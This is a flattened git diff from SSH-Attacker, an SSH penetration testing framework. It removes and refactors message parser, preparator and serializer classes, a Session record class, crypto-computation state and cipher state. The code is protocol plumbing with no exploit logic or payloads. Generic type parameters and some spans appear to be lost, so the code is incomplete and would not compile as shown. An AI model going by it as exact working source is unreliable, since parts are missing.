Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.connection.parser; - -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; -import java.io.InputStream; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class ConnectionMessageParser extends ProtocolMessageParser { - - private static final Logger LOGGER = LogManager.getLogger(); - - /** - * Constructor for the Parser class - * - * @param stream nputstream to Parse the ConnectionMessage from - */ - public ConnectionMessageParser(InputStream stream) { - super(stream); - } - - @Override - public void parse(ConnectionMessage message) { - LOGGER.debug("Parsing ApplicationMessage"); - parseData(message); - message.setCompleteResultingMessage(getAlreadyParsed()); - } - - /** - * Reads the next bytes as the Data and writes them in the message - * - * @param msg Message to write in - */ - private void parseData(ConnectionMessage msg) { - msg.setData(parseByteArrayField(getBytesLeft())); - LOGGER.debug("Data: {}", msg.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java deleted file mode 100644 index 15e4e3947..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java +++ /dev/null @@ -1,40 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.connection.preparator; - -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; -import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class ConnectionMessagePreparator extends ProtocolMessagePreparator { - private static final Logger LOGGER = LogManager.getLogger(); - - private final ConnectionMessage msg; - - public ConnectionMessagePreparator(Chooser chooser, ConnectionMessage message) { - super(chooser, message); - this.msg = message; - } - - @Override - protected void prepareProtocolMessageContents() { - LOGGER.debug("Preparing ApplicationMessage"); - prepareData(msg); - } - - private void prepareData(ConnectionMessage msg) { - if (msg.getDataConfig() != null) { - msg.setData(msg.getDataConfig()); - } else { - msg.setData(chooser.getLastHandledAuthenticationMessageData()); - } - LOGGER.debug("Data: {}", msg.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java deleted file mode 100644 index 2b6b5aba3..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java +++ /dev/null @@ -1,40 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.connection.serializer; - -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class ConnectionMessageSerializer extends ProtocolMessageSerializer { - - private static final Logger LOGGER = LogManager.getLogger(); - - /** - * Constructor for the ApplicationMessageSerializer - * - * @param message Message that should be serialized - */ - public ConnectionMessageSerializer(ConnectionMessage message) { - super(message); - } - - @Override - protected byte[] serializeBytes() { - LOGGER.debug("Serializing ApplicationMessage"); - writeData(); - return getAlreadySerialized(); - } - - /** Writes the data of the ApplicationMessage into the final byte[] */ - private void writeData() { - appendBytes(message.getData().getValue()); - LOGGER.debug("Data: {}", message.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java index b46c26171..0ada05251 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java @@ -53,7 +53,7 @@ public class KeyExchangeInitMessage extends SshMessage { public KeyExchangeInitMessage() { super(); - this.protocolMessageType = ProtocolMessageType.SSH_MSG_KEXINIT; + this.messageIdConstant = MessageIdConstant.SSH_MSG_KEXINIT; } public ModifiableByteArray getCookie() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java index 14324e722..e703249a3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java @@ -10,7 +10,6 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.CharConstants; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.VersionExchangeMessageHandler; @@ -31,7 +30,6 @@ public class VersionExchangeMessage extends ProtocolMessage { - - /** maximum length configuration for this record */ - private Integer maxRecordLengthConfig; - - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.CIPHERTEXT) - private ModifiableByteArray completeRecordBytes; - - /** - * protocol message bytes transported in the record as seen on the transport layer if encryption - * is active this is encrypted if not its plaintext - */ - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.CIPHERTEXT) - private ModifiableByteArray protocolMessageBytes; - - /** The decrypted , unpadded, unmaced record bytes */ - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) - private ModifiableByteArray cleanProtocolMessageBytes; - - private ProtocolMessageType contentMessageType; - - /** Content type */ - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.TLS_CONSTANT) - private ModifiableByte contentType; - - /** Record Layer Protocol Version */ - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.TLS_CONSTANT) - private ModifiableByteArray protocolVersion; - - /** total length of the protocol message (handshake, alert..) included in the record layer */ - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.LENGTH) - private ModifiableInteger length; - - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.COUNT) - private ModifiableInteger epoch; - - /** - * This is the implicit sequence number in TLS and also the explicit sequence number in DTLS - * This could also have been a separate field within the computations struct but i chose to only - * keep one of them as the whole situation is already complicated enough - */ - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.COUNT) - private ModifiableBigInteger sequenceNumber; - - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.NONE) - private ModifiableByteArray connectionId; - - private SessionCryptoComputations computations; - - /*public Session(Config config) { - this.maxRecordLengthConfig = config.getDefaultMaxRecordData(); - }*/ - - public Session() {} - - public Session(Integer maxRecordLengthConfig) { - this.maxRecordLengthConfig = maxRecordLengthConfig; - } - - public ModifiableInteger getLength() { - return length; - } - - public ModifiableByte getContentType() { - return contentType; - } - - public ModifiableByteArray getProtocolVersion() { - return protocolVersion; - } - - public void setLength(ModifiableInteger length) { - this.length = length; - } - - public void setLength(int length) { - this.length = ModifiableVariableFactory.safelySetValue(this.length, length); - } - - public void setContentType(ModifiableByte contentType) { - this.contentType = contentType; - } - - public void setContentType(byte contentType) { - this.contentType = ModifiableVariableFactory.safelySetValue(this.contentType, contentType); - } - - public void setProtocolVersion(ModifiableByteArray protocolVersion) { - this.protocolVersion = protocolVersion; - } - - public void setProtocolVersion(byte[] array) { - this.protocolVersion = - ModifiableVariableFactory.safelySetValue(this.protocolVersion, array); - } - - public ModifiableInteger getEpoch() { - return epoch; - } - - public void setEpoch(ModifiableInteger epoch) { - this.epoch = epoch; - } - - public void setEpoch(Integer epoch) { - this.epoch = ModifiableVariableFactory.safelySetValue(this.epoch, epoch); - } - - public ModifiableBigInteger getSequenceNumber() { - return sequenceNumber; - } - - public void setSequenceNumber(ModifiableBigInteger sequenceNumber) { - this.sequenceNumber = sequenceNumber; - } - - public void setSequenceNumber(BigInteger sequenceNumber) { - this.sequenceNumber = - ModifiableVariableFactory.safelySetValue(this.sequenceNumber, sequenceNumber); - } - - public ModifiableByteArray getConnectionId() { - return connectionId; - } - - public void setConnectionId(byte[] connectionId) { - this.connectionId = - ModifiableVariableFactory.safelySetValue(this.connectionId, connectionId); - } - - public void setConnectionId(ModifiableByteArray connectionId) { - this.connectionId = connectionId; - } - - public SessionPreparator getSessionPreparator( - SshContext sshContext, - // Encryptor encryptor, - // RecordCompressor compressor, - ProtocolMessageType type) { - return new SessionPreparator(sshContext, this, null /*type, compressor*/); - // return new SessionPreparator(sshContext, this, encryptor /*type, compressor*/); - } - - /*public SessionParser getSessionParser( - InputStream stream, ProtocolVersion version, TlsContext tlsContext) { - return new SessionParser(stream, version, tlsContext); - }*/ - - public SessionSerializer getSessionSerializer() { - return new SessionSerializer(this); - } - - /*public void adjustContext(SshContext sshContext) { - ProtocolVersion version = - ProtocolVersion.getProtocolVersion(getProtocolVersion().getValue()); - tlsContext.setLastRecordVersion(version); - }*/ - - public ProtocolMessageType getContentMessageType() { - return contentMessageType; - } - - public void setContentMessageType(ProtocolMessageType contentMessageType) { - this.contentMessageType = contentMessageType; - } - - public ModifiableByteArray getCleanProtocolMessageBytes() { - return cleanProtocolMessageBytes; - } - - public void setCleanProtocolMessageBytes(byte[] cleanProtocolMessageBytes) { - this.cleanProtocolMessageBytes = - ModifiableVariableFactory.safelySetValue( - this.cleanProtocolMessageBytes, cleanProtocolMessageBytes); - } - - public void setCleanProtocolMessageBytes(ModifiableByteArray cleanProtocolMessageBytes) { - this.cleanProtocolMessageBytes = cleanProtocolMessageBytes; - } - - public ModifiableByteArray getProtocolMessageBytes() { - return protocolMessageBytes; - } - - public void setProtocolMessageBytes(ModifiableByteArray protocolMessageBytes) { - this.protocolMessageBytes = protocolMessageBytes; - } - - public void setProtocolMessageBytes(byte[] bytes) { - this.protocolMessageBytes = - ModifiableVariableFactory.safelySetValue(this.protocolMessageBytes, bytes); - } - - public Integer getMaxRecordLengthConfig() { - return maxRecordLengthConfig; - } - - public void setMaxRecordLengthConfig(Integer maxRecordLengthConfig) { - this.maxRecordLengthConfig = maxRecordLengthConfig; - } - - public ModifiableByteArray getCompleteRecordBytes() { - return completeRecordBytes; - } - - public void setCompleteRecordBytes(ModifiableByteArray completeRecordBytes) { - this.completeRecordBytes = completeRecordBytes; - } - - public void setCompleteRecordBytes(byte[] completeRecordBytes) { - this.completeRecordBytes = - ModifiableVariableFactory.safelySetValue( - this.completeRecordBytes, completeRecordBytes); - } - - public SessionCryptoComputations getComputations() { - return computations; - } - - public void setComputations(SessionCryptoComputations computations) { - this.computations = computations; - } - - public void prepareComputations() { - if (computations == null) { - this.computations = new SessionCryptoComputations(); - } - } - - @Override - public String toString() { - return "Record{" - + "contentType=" - + contentType - + ", protocolVersion=" - + protocolVersion - + ", length=" - + length - + '}'; - } - - @Override - public int hashCode() { - int hash = 7; - hash = 29 * hash + Objects.hashCode(this.contentType); - hash = 29 * hash + Objects.hashCode(this.protocolVersion); - hash = 29 * hash + Objects.hashCode(this.length); - hash = 29 * hash + Objects.hashCode(this.epoch); - hash = 29 * hash + Objects.hashCode(this.sequenceNumber); - hash = 29 * hash + Objects.hashCode(this.connectionId); - // hash = 29 * hash + Objects.hashCode(this.computations); - return hash; - } - - @Override - public boolean equals(Object obj) { - if (this == obj) { - return true; - } - if (obj == null) { - return false; - } - if (getClass() != obj.getClass()) { - return false; - } - final Session other = (Session) obj; - if (!Objects.equals(this.contentType, other.contentType)) { - return false; - } - if (!Objects.equals(this.protocolVersion, other.protocolVersion)) { - return false; - } - if (!Objects.equals(this.length, other.length)) { - return false; - } - if (!Objects.equals(this.epoch, other.epoch)) { - return false; - } - if (!Objects.equals(this.sequenceNumber, other.sequenceNumber)) { - return false; - } - if (!Objects.equals(this.connectionId, other.connectionId)) { - return false; - } - /*if (!Objects.equals(this.computations, other.computations)) { - return false; - }*/ - return true; - } - - @Override - public List getAllModifiableVariableHolders() { - List holders = super.getAllModifiableVariableHolders(); - /*if (computations != null) { - holders.add(computations); - }*/ - return holders; - } - - @Override - public void reset() { - super.reset(); - setContentMessageType(null); - } - - // TODO Fix this mess for records - @Override - public SessionParser getParser(SshContext context, InputStream stream) { - return new SessionParser(context, stream); - } - - @Override - public SessionPreparator getPreparator(SshContext context) { - // return new SessionPreparator(context, this, null, contentMessageType, null); - return new SessionPreparator(context, this, null); - } - - @Override - public SessionSerializer getSerializer(SshContext context) { - return new SessionSerializer(this); - } - - @Override - public Handler getHandler(SshContext sshContext) { - throw new UnsupportedOperationException( - "Not supported yet."); // To change body of generated methods, choose - // Tools | Templates. - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/SessionCryptoComputations.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/SessionCryptoComputations.java deleted file mode 100644 index ce6c18f31..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/SessionCryptoComputations.java +++ /dev/null @@ -1,381 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session; - -import de.rub.nds.modifiablevariable.ModifiableVariableFactory; -import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; -import de.rub.nds.modifiablevariable.integer.ModifiableInteger; -import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; -import java.io.Serializable; -import java.util.Objects; - -public class SessionCryptoComputations extends ModifiableVariableHolder implements Serializable { - - /** The key used for the symmetric cipher */ - private ModifiableByteArray cipherKey; - - /** The key used for the HMAC */ - private ModifiableByteArray macKey; - - /** The HMAC of the record */ - private ModifiableByteArray mac; - - /** The implicit part of the nonce for aead taken from the keyBlock */ - private ModifiableByteArray aeadSalt; - - /** The explicit nonce for aead which is transmitted in plain in each message */ - private ModifiableByteArray explicitNonce; - - /** The whole gcm nonce (salt || explicit nonce) */ - private ModifiableByteArray gcmNonce; - - /** The whole padding */ - private ModifiableByteArray padding; - - /** The number of padding bytes which should be added beyond the required padding */ - private ModifiableInteger additionalPaddingLength; - - /** The bytes which are going to be passed to the encrypt function */ - private ModifiableByteArray plainRecordBytes; - - /** The bytes of the plain message that are going to be authenticated */ - private ModifiableByteArray authenticatedNonMetaData; - - /** The pure ciphertext part of the record. The output from the negotiated cipher */ - private ModifiableByteArray ciphertext; - - /** The CBC IV */ - private ModifiableByteArray cbcInitialisationVector; - - /** The data over which the HMACs/tags are computed which are not explicitly transmitted. */ - private ModifiableByteArray authenticatedMetaData; - - private ModifiableByteArray authenticationTag; - - private Boolean paddingValid = null; - - private Boolean macValid = null; - - private Boolean authenticationTagValid = null; - - // private Tls13KeySetType usedTls13KeySetType = Tls13KeySetType.NONE; - - public SessionCryptoComputations() {} - - @Override - public void reset() { - super.reset(); - paddingValid = null; - macValid = null; - authenticationTagValid = null; - } - - public ModifiableByteArray getCipherKey() { - return cipherKey; - } - - public void setCipherKey(ModifiableByteArray cipherKey) { - this.cipherKey = cipherKey; - } - - public void setCipherKey(byte[] cipherKey) { - this.cipherKey = ModifiableVariableFactory.safelySetValue(this.cipherKey, cipherKey); - } - - public ModifiableByteArray getMacKey() { - return macKey; - } - - public void setMacKey(ModifiableByteArray macKey) { - this.macKey = macKey; - } - - public void setMacKey(byte[] macKey) { - this.macKey = ModifiableVariableFactory.safelySetValue(this.macKey, macKey); - } - - public ModifiableByteArray getMac() { - return mac; - } - - public void setMac(ModifiableByteArray mac) { - this.mac = mac; - } - - public void setMac(byte[] mac) { - this.mac = ModifiableVariableFactory.safelySetValue(this.mac, mac); - } - - public ModifiableByteArray getPadding() { - return padding; - } - - public void setPadding(ModifiableByteArray padding) { - this.padding = padding; - } - - public void setPadding(byte[] padding) { - this.padding = ModifiableVariableFactory.safelySetValue(this.padding, padding); - } - - public ModifiableByteArray getPlainRecordBytes() { - return plainRecordBytes; - } - - public void setPlainRecordBytes(ModifiableByteArray plainRecordBytes) { - this.plainRecordBytes = plainRecordBytes; - } - - public void setPlainRecordBytes(byte[] plainRecordBytes) { - this.plainRecordBytes = - ModifiableVariableFactory.safelySetValue(this.plainRecordBytes, plainRecordBytes); - } - - public ModifiableByteArray getCbcInitialisationVector() { - return cbcInitialisationVector; - } - - public void setCbcInitialisationVector(ModifiableByteArray cbcInitialisationVector) { - this.cbcInitialisationVector = cbcInitialisationVector; - } - - public void setCbcInitialisationVector(byte[] initialisationVector) { - this.cbcInitialisationVector = - ModifiableVariableFactory.safelySetValue( - this.cbcInitialisationVector, initialisationVector); - } - - public ModifiableByteArray getAuthenticatedMetaData() { - return authenticatedMetaData; - } - - public void setAuthenticatedMetaData(ModifiableByteArray authenticatedMetaData) { - this.authenticatedMetaData = authenticatedMetaData; - } - - public void setAuthenticatedMetaData(byte[] authenticatedMetaData) { - this.authenticatedMetaData = - ModifiableVariableFactory.safelySetValue( - this.authenticatedMetaData, authenticatedMetaData); - } - - public ModifiableByteArray getAuthenticatedNonMetaData() { - return authenticatedNonMetaData; - } - - public void setAuthenticatedNonMetaData(ModifiableByteArray authenticatedNonMetaData) { - this.authenticatedNonMetaData = authenticatedNonMetaData; - } - - public void setAuthenticatedNonMetaData(byte[] authenticatedNonMetaData) { - this.authenticatedNonMetaData = - ModifiableVariableFactory.safelySetValue( - this.authenticatedNonMetaData, authenticatedNonMetaData); - } - - public ModifiableInteger getAdditionalPaddingLength() { - return additionalPaddingLength; - } - - public void setAdditionalPaddingLength(ModifiableInteger additionalPaddingLength) { - this.additionalPaddingLength = additionalPaddingLength; - } - - public void setAdditionalPaddingLength(Integer paddingLength) { - this.additionalPaddingLength = - ModifiableVariableFactory.safelySetValue( - this.additionalPaddingLength, paddingLength); - } - - public Boolean getPaddingValid() { - return paddingValid; - } - - public void setPaddingValid(Boolean paddingValid) { - this.paddingValid = paddingValid; - } - - public Boolean getMacValid() { - return macValid; - } - - public void setMacValid(Boolean macValid) { - this.macValid = macValid; - } - - public ModifiableByteArray getCiphertext() { - return ciphertext; - } - - public void setCiphertext(ModifiableByteArray ciphertext) { - this.ciphertext = ciphertext; - } - - public void setCiphertext(byte[] ciphertext) { - this.ciphertext = ModifiableVariableFactory.safelySetValue(this.ciphertext, ciphertext); - } - - public ModifiableByteArray getAeadSalt() { - return aeadSalt; - } - - public void setAeadSalt(ModifiableByteArray aeadSalt) { - this.aeadSalt = aeadSalt; - } - - public void setAeadSalt(byte[] aeadSalt) { - this.aeadSalt = ModifiableVariableFactory.safelySetValue(this.aeadSalt, aeadSalt); - } - - public ModifiableByteArray getExplicitNonce() { - return explicitNonce; - } - - public void setExplicitNonce(ModifiableByteArray explicitNonce) { - this.explicitNonce = explicitNonce; - } - - public void setExplicitNonce(byte[] explicitNonce) { - this.explicitNonce = - ModifiableVariableFactory.safelySetValue(this.explicitNonce, explicitNonce); - } - - public ModifiableByteArray getGcmNonce() { - return gcmNonce; - } - - public void setGcmNonce(ModifiableByteArray gcmNonce) { - this.gcmNonce = gcmNonce; - } - - public void setGcmNonce(byte[] gcmNonce) { - this.gcmNonce = ModifiableVariableFactory.safelySetValue(this.gcmNonce, gcmNonce); - } - - public ModifiableByteArray getAuthenticationTag() { - return authenticationTag; - } - - public void setAuthenticationTag(ModifiableByteArray authenticationTag) { - this.authenticationTag = authenticationTag; - } - - public void setAuthenticationTag(byte[] authenticationTag) { - this.authenticationTag = - ModifiableVariableFactory.safelySetValue(this.authenticationTag, authenticationTag); - } - - public Boolean getAuthenticationTagValid() { - return authenticationTagValid; - } - - public void setAuthenticationTagValid(Boolean authenticationTagValid) { - this.authenticationTagValid = authenticationTagValid; - } - - public void setAuthenticationTagValid(boolean authenticationTagValid) { - this.authenticationTagValid = authenticationTagValid; - } - - @Override - public int hashCode() { - int hash = 5; - hash = 31 * hash + Objects.hashCode(this.cipherKey); - hash = 31 * hash + Objects.hashCode(this.macKey); - hash = 31 * hash + Objects.hashCode(this.mac); - hash = 31 * hash + Objects.hashCode(this.aeadSalt); - hash = 31 * hash + Objects.hashCode(this.explicitNonce); - hash = 31 * hash + Objects.hashCode(this.gcmNonce); - hash = 31 * hash + Objects.hashCode(this.padding); - hash = 31 * hash + Objects.hashCode(this.additionalPaddingLength); - hash = 31 * hash + Objects.hashCode(this.plainRecordBytes); - hash = 31 * hash + Objects.hashCode(this.authenticatedNonMetaData); - hash = 31 * hash + Objects.hashCode(this.ciphertext); - hash = 31 * hash + Objects.hashCode(this.cbcInitialisationVector); - hash = 31 * hash + Objects.hashCode(this.authenticatedMetaData); - hash = 31 * hash + Objects.hashCode(this.authenticationTag); - hash = 31 * hash + Objects.hashCode(this.paddingValid); - hash = 31 * hash + Objects.hashCode(this.macValid); - hash = 31 * hash + Objects.hashCode(this.authenticationTagValid); - return hash; - } - - @Override - public boolean equals(Object obj) { - if (this == obj) { - return true; - } - if (obj == null) { - return false; - } - if (getClass() != obj.getClass()) { - return false; - } - final SessionCryptoComputations other = (SessionCryptoComputations) obj; - if (!Objects.equals(this.cipherKey, other.cipherKey)) { - return false; - } - if (!Objects.equals(this.macKey, other.macKey)) { - return false; - } - if (!Objects.equals(this.mac, other.mac)) { - return false; - } - if (!Objects.equals(this.aeadSalt, other.aeadSalt)) { - return false; - } - if (!Objects.equals(this.explicitNonce, other.explicitNonce)) { - return false; - } - if (!Objects.equals(this.gcmNonce, other.gcmNonce)) { - return false; - } - if (!Objects.equals(this.padding, other.padding)) { - return false; - } - if (!Objects.equals(this.additionalPaddingLength, other.additionalPaddingLength)) { - return false; - } - if (!Objects.equals(this.plainRecordBytes, other.plainRecordBytes)) { - return false; - } - if (!Objects.equals(this.authenticatedNonMetaData, other.authenticatedNonMetaData)) { - return false; - } - if (!Objects.equals(this.ciphertext, other.ciphertext)) { - return false; - } - if (!Objects.equals(this.cbcInitialisationVector, other.cbcInitialisationVector)) { - return false; - } - if (!Objects.equals(this.authenticatedMetaData, other.authenticatedMetaData)) { - return false; - } - if (!Objects.equals(this.authenticationTag, other.authenticationTag)) { - return false; - } - if (!Objects.equals(this.paddingValid, other.paddingValid)) { - return false; - } - if (!Objects.equals(this.macValid, other.macValid)) { - return false; - } - if (!Objects.equals(this.authenticationTagValid, other.authenticationTagValid)) { - return false; - } - return true; - } - - /*public Tls13KeySetType getUsedTls13KeySetType() { - return usedTls13KeySetType; - } - - public void setUsedTls13KeySetType(Tls13KeySetType usedTls13KeySetType) { - this.usedTls13KeySetType = usedTls13KeySetType; - }*/ -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/CipherState.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/CipherState.java deleted file mode 100644 index 72e429d75..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/CipherState.java +++ /dev/null @@ -1,126 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.cipher; - -import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; -import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; -import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; -import de.rub.nds.sshattacker.core.constants.MacAlgorithm; -import de.rub.nds.sshattacker.core.session.cipher.cryptohelper.KeySet; - -public class CipherState { - - /*private ProtocolVersion protocolVersion; - private CipherSuite cipherSuite;*/ - private CompressionAlgorithm compressionAlgorithm; - private EncryptionAlgorithm encryptionAlgorithm; - private MacAlgorithm macAlgorithm; - private KeyExchangeAlgorithm keyExchangeAlgorithm; - - private KeySet keySet; - - /** sequence number used for the encryption */ - private long writeSequenceNumber = 0; - - /** sequence number used for the decryption */ - private long readSequenceNumber = 0; - - private byte[] connectionId = null; - - private Boolean encryptThenMac; - - /*public CipherState( - ProtocolVersion protocolVersion, - CipherSuite cipherSuite, - KeySet keySet, - Boolean encryptThenMac) { - this.protocolVersion = protocolVersion; - this.cipherSuite = cipherSuite; - this.keySet = keySet; - this.encryptThenMac = encryptThenMac; - this.connectionId = null; - }*/ - - /*public CipherState( - ProtocolVersion protocolVersion, - CipherSuite cipherSuite, - KeySet keySet, - Boolean encryptThenMac, - byte[] connectionId) { - this.protocolVersion = protocolVersion; - this.cipherSuite = cipherSuite; - this.keySet = keySet; - this.encryptThenMac = encryptThenMac; - this.connectionId = connectionId; - }*/ - - public CipherState( - CompressionAlgorithm compressionAlgorithm, - EncryptionAlgorithm encryptionAlgorithm, - MacAlgorithm macAlgorithm, - KeyExchangeAlgorithm keyExchangeAlgorithm, - KeySet keySet, - Boolean encryptThenMac, - byte[] connectionId) { - this.compressionAlgorithm = compressionAlgorithm; - this.encryptionAlgorithm = encryptionAlgorithm; - this.macAlgorithm = macAlgorithm; - this.keyExchangeAlgorithm = keyExchangeAlgorithm; - this.keySet = keySet; - this.encryptThenMac = encryptThenMac; - this.connectionId = connectionId; - } - - public Boolean isEncryptThenMac() { - return encryptThenMac; - } - - public void setEncryptThenMac(Boolean encryptThenMac) { - this.encryptThenMac = encryptThenMac; - } - - public KeySet getKeySet() { - return keySet; - } - - public void setKeySet(KeySet keySet) { - this.keySet = keySet; - } - - public long getWriteSequenceNumber() { - return writeSequenceNumber; - } - - public void setWriteSequenceNumber(long writeSequenceNumber) { - this.writeSequenceNumber = writeSequenceNumber; - } - - public void increaseWriteSequenceNumber() { - writeSequenceNumber += 1; - } - - public long getReadSequenceNumber() { - return readSequenceNumber; - } - - public void setReadSequenceNumber(long readSequenceNumber) { - this.readSequenceNumber = readSequenceNumber; - } - - public void increaseReadSequenceNumber() { - readSequenceNumber += 1; - } - - public byte[] getConnectionId() { - return connectionId; - } - - public void setConnectionId(byte[] connectionId) { - this.connectionId = connectionId; - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipher.java deleted file mode 100644 index cd5696d3d..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipher.java +++ /dev/null @@ -1,273 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.cipher; - -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.crypto.cipher.DecryptionCipher; -import de.rub.nds.sshattacker.core.crypto.cipher.EncryptionCipher; -import de.rub.nds.sshattacker.core.exceptions.CryptoException; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.data.Parser; -import de.rub.nds.sshattacker.core.session.Session; -import de.rub.nds.tlsattacker.transport.ConnectionEndType; -import java.io.ByteArrayInputStream; -import java.io.ByteArrayOutputStream; -import java.util.Random; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public abstract class SessionCipher { - - private static final Logger LOGGER = LogManager.getLogger(); - - public static final byte[] SEQUENCE_NUMBER_PLACEHOLDER = - new byte[] { - (byte) 0xFF, - (byte) 0xFF, - (byte) 0xFF, - (byte) 0xFF, - (byte) 0xFF, - (byte) 0xFF, - (byte) 0xFF, - (byte) 0xFF - }; - - /** cipher for decryption */ - protected DecryptionCipher decryptCipher; - - /** cipher for encryption */ - protected EncryptionCipher encryptCipher; - - /** TLS context */ - protected SshContext sshContext; - - /** cipher state */ - private CipherState state; - - public SessionCipher(SshContext sshContext, CipherState state) { - this.sshContext = sshContext; - this.state = state; - } - - public abstract void encrypt(Session session) throws CryptoException; - - public abstract void decrypt(Session session) throws CryptoException; - - /** - * This function collects data needed for computing MACs and other authentication tags in - * CBC/CCM/GCM cipher suites. - * - *

